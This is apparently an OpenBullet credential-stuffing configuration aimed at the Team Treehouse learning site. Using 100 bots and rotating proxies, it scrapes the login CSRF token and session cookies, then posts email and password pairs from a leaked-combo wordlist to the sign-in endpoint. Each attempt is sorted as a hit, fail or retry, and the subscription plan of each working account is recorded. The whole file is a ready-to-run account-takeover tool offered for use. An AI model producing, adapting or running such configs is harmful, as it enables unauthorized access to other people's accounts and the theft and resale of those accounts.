[SETTINGS]
{
  "Name": "TeamTreeHouse",
  "SuggestedBots": 100,
  "LastModified": "2018-06-07T18:58:42.4861097+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#REQUEST_AUTHENTICITY_TOKEN_(GET) REQUEST GET "https://teamtreehouse.com/signin?return_to=https%3A%2F%2Fteamtreehouse.com%2Fhome" AutoRedirect=FALSE 
  CONTENT "return_to=https%3A%2F%2Fteamtreehouse.com%2Fhome" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_AUTHENTICITY_TOKEN PARSE "<SOURCE>" LR "<meta name=\"csrf-token\" content=\"" "\" />" Recursive=FALSE -> VAR "AUTHENTICITYTOKEN" "" "" 
#PARSE_VID PARSE "<COOKIES(sid)>" LR "" "" Recursive=FALSE -> VAR "VID" "" "" 
#PARSE_SID PARSE "<COOKIES(sid)>" LR "" "" Recursive=FALSE -> VAR "SID" "" "" 
#PARSE_SESSIONID PARSE "<COOKIES(_treehouse_session)>" LR "" "" Recursive=FALSE -> VAR "SESSIONID" "" "" 
#REQUEST_LOGIN_(POST) REQUEST POST "https://teamtreehouse.com/person_session" AutoRedirect=FALSE 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<AUTHENTICITYTOKEN>&return_to=%2F&user_session%5Bemail%5D=<USER>&user_session%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "_treehouse_session: <SESSIONID>" 
  COOKIE "vid: <VID>" 
  COOKIE "sid: <SID>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://teamtreehouse.com/signin?return_to=https%3A%2F%2Fteamtreehouse.com%2Fhome" 
  HEADER "Origin: https://teamtreehouse.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Welcome Home" 
  KEYCHAIN Failure OR 
    KEY "error-message" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" Contains "500" 
#REQUEST_INFO_(GET) REQUEST GET "https://teamtreehouse.com/account/enrollment" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "_treehouse_session: <SESSIONID>" 
  COOKIE "vid: <VID>" 
  COOKIE "sid: <SID>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://teamtreehouse.com/home" 
#PARSE_PLAN PARSE "<SOURCE>" CSS "[class=grid-50]" "innerHTML" 0 -> CAP "PLAN" "" "" 
